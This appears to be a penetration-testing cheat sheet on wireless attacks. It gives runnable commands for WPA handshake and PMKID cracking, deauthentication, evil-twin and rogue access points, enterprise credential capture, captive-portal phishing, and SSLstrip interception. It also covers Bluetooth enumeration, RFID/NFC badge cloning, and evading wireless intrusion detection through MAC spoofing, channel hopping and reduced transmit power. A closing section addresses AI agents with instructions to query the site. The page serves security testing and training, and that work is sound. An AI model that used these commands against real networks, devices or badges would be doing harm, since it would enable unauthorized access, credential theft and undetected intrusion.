# Wireless Testing

## WiFi Attacks

### Reconnaissance

```bash
# Enable monitor mode
airmon-ng start wlan0
# or
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Scan for networks
airodump-ng wlan0mon
airodump-ng wlan0mon --band abg  # All bands
airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture  # Target specific AP

# Kismet (comprehensive wireless scanner)
kismet -c wlan0mon
```

### WPA/WPA2 PSK Attacks

```bash
# Capture handshake
airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

# Deauth to force reconnection (capture handshake)
aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

# Check if handshake captured
aircrack-ng capture-01.cap

# Crack with wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

# Crack with hashcat (convert first)
# https://hashcat.net/cap2hashcat/
hcxpcapngtool -o hash.hc22000 capture-01.cap
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

# PMKID attack (no handshake needed)
# https://github.com/ZerBea/hcxdumptool
hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1
hcxpcapngtool -o pmkid.hc22000 pmkid.pcapng
hashcat -m 22000 pmkid.hc22000 wordlist.txt
```

### WPA3 Attacks

```bash
# Dragonblood attacks (CVE-2019-9494, CVE-2019-9496)
# https://github.com/vanhoefm/dragonslayer

# WPA3 downgrade attack
# Force clients to use WPA2 instead
# Create rogue AP with same SSID but WPA2 only

# Timing side-channel attack
# https://wpa3.mathyvanhoef.com/
```

### WPA Enterprise Attacks

```bash
# EAP downgrade / Evil Twin
# https://github.com/s0lst1c3/eaphammer
eaphammer -i wlan0 --channel 6 --auth wpa-eap --essid "CorpWiFi" --creds

# hostapd-mana for credential capture
# https://github.com/sensepost/hostapd-mana

# Capture RADIUS credentials
# Crack with asleap or hashcat
asleap -C <challenge> -R <response> -W wordlist.txt

# EAP-TLS certificate attack
# Extract certificates from supplicant config
# Create rogue RADIUS server with stolen certs
```

### WEP Attacks (Legacy)

```bash
# Capture IVs
airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

# ARP replay attack
aireplay-ng -3 -b <AP_MAC> -h <YOUR_MAC> wlan0mon

# Crack when enough IVs captured
aircrack-ng capture-01.cap
```

### Rogue Access Point

```bash
# Create evil twin
# https://github.com/wifiphisher/wifiphisher
wifiphisher -aI wlan0 -eI wlan1 -p firmware-upgrade

# Manual setup with hostapd
cat > hostapd.conf << EOF
interface=wlan0
driver=nl80211
ssid=Free_WiFi
channel=6
hw_mode=g
EOF
hostapd hostapd.conf

# Setup DHCP and routing
dnsmasq -C dnsmasq.conf
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
```

### WiFi Pineapple Techniques

```bash
# Karma attack - respond to all probe requests
# PineAP in WiFi Pineapple

# Captive portal credential harvesting
# Redirect all HTTP traffic to phishing page

# MITM with SSLstrip
sslstrip -l 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
```

## Bluetooth Attacks

### Reconnaissance

```bash
# Enable Bluetooth adapter
hciconfig hci0 up

# Scan for devices
hcitool scan
hcitool inq

# Get device info
hcitool info <BD_ADDR>

# Service discovery
sdptool browse <BD_ADDR>

# BlueZ tools
bluetoothctl
> scan on
> devices
```

### BlueBorne (CVE-2017-0781, CVE-2017-0782, etc.)

```bash
# Check if vulnerable
# https://github.com/ArmEss/BlueBorne-v2
python3 blueborne_scanner.py <BD_ADDR>
```

### KNOB Attack (CVE-2019-9506)

```bash
# Key Negotiation of Bluetooth attack
# Reduces encryption key entropy
# Requires specialized hardware and software
```

### BLE (Bluetooth Low Energy)

```bash
# Scan for BLE devices
# https://github.com/securing/gattacker
hcitool lescan

# Connect and enumerate services
gatttool -b <BD_ADDR> -I
> connect
> primary
> characteristics

# BLE CTF tools
# https://github.com/hackgnar/ble_ctf
```

### Bluetooth Sniffing

```bash
# Ubertooth
# https://github.com/greatscottgadgets/ubertooth
ubertooth-scan
ubertooth-btbb -f -c output.pcap

# Analyze with Wireshark
wireshark -i ubertooth
```

## RFID/NFC Attacks

### Proxmark3

```bash
# Read card
proxmark3> lf search
proxmark3> hf search

# Clone EM410x (125kHz)
proxmark3> lf em 410x clone --id <ID>

# Clone MIFARE Classic
proxmark3> hf mf autopwn

# Sniff transactions
proxmark3> hf 14a sniff
```

### NFC Tools (Android)

```bash
# NFC Tools app - Read/Write tags
# MIFARE Classic Tool - Crack/clone MIFARE

# ACR122U USB reader
nfc-list
nfc-mfclassic r a dump.mfd  # Read
nfc-mfclassic w a dump.mfd  # Write
```

### Badge Cloning

```bash
# HID iClass
proxmark3> hf iclass dump

# Read with flipper zero
# https://flipperzero.one/

# Long range readers
# ESPKey for HID readers
# https://redteamtools.com/espkey
```

## Wireless IDS Evasion

### Channel Hopping

```bash
# Rapidly change channels to avoid detection
while true; do
    for ch in 1 6 11; do
        iwconfig wlan0mon channel $ch
        sleep 1
    done
done
```

### MAC Spoofing

```bash
# Change MAC address
ip link set wlan0 down
macchanger -r wlan0
ip link set wlan0 up

# Or manual
ip link set dev wlan0 address XX:XX:XX:XX:XX:XX
```

### Signal Strength Control

```bash
# Reduce TX power to avoid detection
iwconfig wlan0 txpower 1
```

## Tools Summary

| Tool              | Purpose            |
| ----------------- | ------------------ |
| aircrack-ng suite | WiFi cracking      |
| Wifiphisher       | Evil twin attacks  |
| Kismet            | Wireless recon     |
| hcxtools          | PMKID attacks      |
| Bettercap         | MITM framework     |
| Proxmark3         | RFID/NFC           |
| Ubertooth         | Bluetooth sniffing |
| Flipper Zero      | Multi-protocol     |

## Resources

* [Aircrack-ng Documentation](https://www.aircrack-ng.org/doku.php)
* [WiFi Pineapple Wiki](https://docs.hak5.org/wifi-pineapple/)
* [Proxmark3 Wiki](https://github.com/RfidResearchGroup/proxmark3/wiki)
* [Bluetooth Security](https://www.bluetooth.com/learn-about-bluetooth/key-attributes/bluetooth-security/)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.pentest-book.com/others/wireless.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.